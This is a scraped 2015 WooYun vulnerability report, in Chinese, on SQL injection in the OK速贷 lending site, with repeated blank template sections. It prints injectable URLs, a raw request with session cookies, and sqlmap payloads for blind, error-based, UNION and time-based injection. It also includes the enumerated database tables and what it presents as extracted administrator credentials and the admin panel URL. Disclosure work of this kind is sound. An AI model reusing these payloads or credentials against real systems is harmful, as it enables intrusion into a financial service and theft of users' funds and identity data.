OK速贷多处高危漏洞可进后台资金数千万（泄漏用户资金、身份认证信息等）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0102306

漏洞标题：OK速贷多处高危漏洞可进后台资金数千万（泄漏用户资金、身份认证信息等）

漏洞作者：撸撸侠

提交时间：2015-03-30 15:23

修复时间：2015-05-14 17:30

公开时间：2015-05-14 17:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-30：细节已通知厂商并且等待厂商处理中
2015-03-30：厂商已经确认，细节仅向厂商公开
2015-04-09：细节向核心白帽子及相关领域专家公开
2015-04-19：细节向普通白帽子公开
2015-04-29：细节向实习白帽子公开
2015-05-14：细节向公众公开

简要描述：

OK速贷多处高危漏洞可进后台资金数千万（泄漏用户资金、身份认证信息等）

详细说明：

注入一：

GET /?plugins&q=areas&area_id=174 HTTP/1.1
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Accept-Encoding: gzip,deflate
Cache-Control: max-age=0
Host: www1.okisbank.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
DNT: 1
Connection: close
Cookie: PHPSESSID=ja1oli3mo1pdjfmpfi8qitrfv3; _jzqx=1.1426652708.1426652708.1.jzqsr=okisbank%2Ecom|jzqct=/user/login%2Ehtml.-; _jzqckmp=1; _ga=GA1.2.264870878.1426652708; _jzqa=1.1246666155320797000.1426652708.1426652708.1426735724.2; _jzqc=1; LXB_REFER=74.125.227.77; _jzqb=1.4.10.1426735724.1; Hm_lvt_0fed600eaace02a001f9ebf0a244f274=1426651774,1426654101,1426654412,1426736984; Hm_lpvt_0fed600eaace02a001f9ebf0a244f274=1426737794; dy_cookie_time=604800; 6ec6cef6a06f93620f0bd7d4d7d741d6=bab4m9R8As45YzkwT%2FjAdIivXGmOFOW8KgPRwOwCjy3WF373l%2BD1rX%2BO0gw
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3

注入二：
http://www1.okisbank.com/u/215'
注入三：
http://www1.okisbank.com/?user&q=code/borrow/loan&p=repay&type=tender&username=189
用户界面带搜索的地方几乎全有注射
例如：http://www1.okisbank.com/?user&q=code/borrow/tender&p=now&keywords=111%27&dotime1=2015-03-19&dotime2=2015-03-19

漏洞证明：

Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND 1731=1731
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND (SELECT 5321 FROM(SELECT COUNT(*),CONCAT(0x7163706271,(SELECT (CASE WHEN (5321=5321) THEN 1 ELSE 0 END)),0x7166796971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 UNION ALL SELECT NULL,CONCAT(0x7163706271,0x4f694676505649465261,0x7166796971),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND SLEEP(5)
---
[12:18:42] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
[12:18:42] [INFO] fetching tables for database: 'okisbank'
Database: okisbank
[134 tables]
+------------------------------------+
| deayou_account                     |
| deayou_account_balance             |
| deayou_account_bank                |
| deayou_account_cash                |
| deayou_account_fee                 |
| deayou_account_fee_type            |
| deayou_account_log                 |
| deayou_account_payment             |
| deayou_account_recharge            |
| deayou_account_users               |
| deayou_account_users_bank          |
| deayou_account_web                 |
| deayou_approve                     |
| deayou_approve_edu                 |
| deayou_approve_edu_id5             |
| deayou_approve_id5                 |
| deayou_approve_realname            |
| deayou_approve_sms                 |
| deayou_approve_smslog              |
| deayou_approve_video               |
| deayou_areas                       |
| deayou_articles                    |
| deayou_articles_pages              |
| deayou_articles_type               |
| deayou_attestations                |
| deayou_attestations_type           |
| deayou_attestations_user           |
| deayou_borrow                      |
| deayou_borrow_activity             |
| deayou_borrow_amount               |
| deayou_borrow_amount_apply         |
| deayou_borrow_amount_log           |
| deayou_borrow_amount_type          |
| deayou_borrow_auto                 |
| deayou_borrow_autolog              |
| deayou_borrow_care                 |
| deayou_borrow_change               |
| deayou_borrow_count                |
| deayou_borrow_count_log            |
| deayou_borrow_credit               |
| deayou_borrow_fee                  |
| deayou_borrow_fee_log              |
| deayou_borrow_fee_type             |
| deayou_borrow_flag                 |
| deayou_borrow_recover              |
| deayou_borrow_repay                |
| deayou_borrow_roam                 |
| deayou_borrow_style                |
| deayou_borrow_tender               |
| deayou_borrow_tender_auto          |
| deayou_borrow_tender_autolog       |
| deayou_borrow_tender_web           |
| deayou_borrow_type                 |
| deayou_borrow_verify               |
| deayou_borrow_vouch                |
| deayou_borrow_vouch_recover        |
| deayou_borrow_vouch_repay          |
| deayou_comment                     |
| deayou_comments                    |
| deayou_credit                      |
| deayou_credit_class                |
| deayou_credit_log                  |
| deayou_credit_rank                 |
| deayou_credit_type                 |
| deayou_dw_activity_review          |
| deayou_group                       |
| deayou_group_articles              |
| deayou_group_comments              |
| deayou_group_log                   |
| deayou_group_member                |
| deayou_group_type                  |
| deayou_linkages                    |
| deayou_linkages_class              |
| deayou_linkages_type               |
| deayou_links                       |
| deayou_links_type                  |
| deayou_luckmember_addcount_history |
| deayou_luckmember_award_address    |
| deayou_luckmember_award_history    |
| deayou_luckmember_count            |
| deayou_message                     |
| deayou_message_receive             |
| deayou_modules                     |
| deayou_rating_assets               |
| deayou_rating_company              |
| deayou_rating_contact              |
| deayou_rating_educations           |
| deayou_rating_finance              |
| deayou_rating_houses               |
| deayou_rating_info                 |
| deayou_rating_job                  |
| deayou_remind                      |
| deayou_remind_log                  |
| deayou_remind_type                 |
| deayou_remind_user                 |
| deayou_scrollpic                   |
| deayou_scrollpic_type              |
| deayou_site                        |
| deayou_site_menu                   |
| deayou_sms_type                    |
| deayou_spread_add                  |
| deayou_spread_log                  |
| deayou_spreads_log                 |
| deayou_spreads_set                 |
| deayou_spreads_users               |
| deayou_system                      |
| deayou_system_auto                 |
| deayou_system_type                 |
| deayou_ucenter                     |
| deayou_ucenter_set                 |
| deayou_users                       |
| deayou_users_admin                 |
| deayou_users_admin_type            |
| deayou_users_adminlog              |
| deayou_users_care                  |
| deayou_users_care_user             |
| deayou_users_email                 |
| deayou_users_email_log             |
| deayou_users_examines              |
| deayou_users_friends               |
| deayou_users_friends_invite        |
| deayou_users_friends_type          |
| deayou_users_info                  |
| deayou_users_log                   |
| deayou_users_qq                    |
| deayou_users_rebut                 |
| deayou_users_reglog                |
| deayou_users_sina                  |
| deayou_users_type                  |
| deayou_users_upfiles               |
| deayou_users_vip                   |
| deayou_users_viplog                |
| deayou_users_visit                 |
| deayou_weixin                      |
+------------------------------------+

注入出管理员账号：
ok速贷
ok123
http://www1.okisbank.com/?admin

mask 区域

*****58f7a9.jpg" alt="1672_ap*****

修复方案：

版权声明：转载请注明来源撸撸侠@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-03-30 17:28

厂商回复：

感谢提交漏洞的作者，我们一定做好网站漏洞修复与防御机制。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0102306

漏洞标题：OK速贷多处高危漏洞可进后台资金数千万（泄漏用户资金、身份认证信息等）

相关厂商：okisbank.com

漏洞作者：撸撸侠

提交时间：2015-03-30 15:23

修复时间：2015-05-14 17:30

公开时间：2015-05-14 17:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源撸撸侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0102306

漏洞标题：OK速贷多处高危漏洞可进后台资金数千万（泄漏用户资金、身份认证信息等）

相关厂商：okisbank.com

漏洞作者： 撸撸侠

提交时间：2015-03-30 15:23

修复时间：2015-05-14 17:30

公开时间：2015-05-14 17:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0102306"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 撸撸侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：撸撸侠

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源撸撸侠@乌云